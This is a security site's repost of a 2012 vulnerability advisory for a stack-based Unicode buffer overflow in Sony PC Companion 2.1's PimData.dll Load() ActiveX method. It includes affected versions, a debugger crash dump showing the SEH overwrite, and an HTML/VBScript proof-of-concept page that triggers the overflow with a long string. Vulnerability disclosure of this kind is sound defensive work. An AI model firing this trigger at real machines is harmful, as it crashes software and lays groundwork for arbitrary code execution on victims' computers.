首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Sony PC Companion 2.1 Load() Unicode Buffer Overflow
来源:zeroscience.mk 作者:LiquidWorm 发布时间:2012-12-24  
Sony PC Companion 2.1 (Load()) Stack-based Unicode Buffer Overload SEH


Vendor: Sony Mobile Communications AB
Product web page: http://www.sonymobile.com
Affected version: 2.10.115 (Production 27.1, Build 830)
                  2.10.108 (Production 26.1, Build 818)

Summary: PC Companion is a computer application that acts as a portal
to Sony Xperia and operator features and applications, such as phone
software updates, management of contacts and calendar, media management
with Media Go, and a backup and restore feature for your phone content.

Desc: The vulnerability is caused due to a boundary error in PimData.dll
when handling the value assigned to the 'File' item in the Load function
and can be exploited to cause a stack-based buffer overflow via an overly
long string which may lead to execution of arbitrary code on the affected
machine.


------------------------------------------------------------------------------

STATUS_STACK_BUFFER_OVERRUN encountered
(59c.162c): Break instruction exception - code 80000003 (first chance)
eax=00000000 ebx=5f392b80 ecx=75b1de28 edx=0019dd59 esi=00000000 edi=002891c4
eip=75b1dca5 esp=0019dfa0 ebp=0019e01c iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
KERNEL32!FormatMessageA+0x13c85:
75b1dca5 cc              int     3
0:000> !exchain
0019e00c: KERNEL32!RegSaveKeyExA+3e9 (75b49b72)
Invalid exception stack at 00420042
0:000> d edi
002891c4  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
002891d4  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
002891e4  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
002891f4  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
00289204  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
00289214  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
00289224  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
00289234  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
0:000>

------------------------------------------------------------------------------


Tested on: Microsoft Windows 7 Ultimate SP1 (EN) 32bit


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2012-5118
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5118.php

http://cwe.mitre.org/data/definitions/121.html


09.11.2012

---


<html>
<body>
<object classid='clsid:EEA36793-F574-4CC1-8690-60E3511CFEAA' id='overrun' />
<script language='vbscript'>
targetFile = "C:\Program Files\Sony\Sony PC Companion\PimData.dll"
prototype  = "Sub Load ( ByVal File As String )"
memberName = "Load"
progid     = "PimDataLib.DataItemCollection"
argCount   = 1

File=String(262, "A") + "BB" + String(1000, "C")

'             ^          ^              ^
'             |          |              |
'----------- junk ----- nseh -------- junk ------

overrun.Load File

</script>
</body>
</html>

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Sony PC Companion 2.1 WebServi
·Sony PC Companion 2.1 CheckCom
·4psa VoipNow 2.x Remote Comman
·Sony PC Companion 2.1 Admin_Re
·FireFly Mediaserver 1.0.0.1359
·TWiki MAKETEXT Remote Command
·SurgeFTP Remote Command Execut
·Foswiki MAKETEXT Remote Comman
·GNU Debugger 7.5.1 NULL Pointe
·Netwin SurgeFTP Remote Command
·IDA Pro 6.3 ELF Anti-Debugging
·IBM Lotus Notes Client URL Han
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved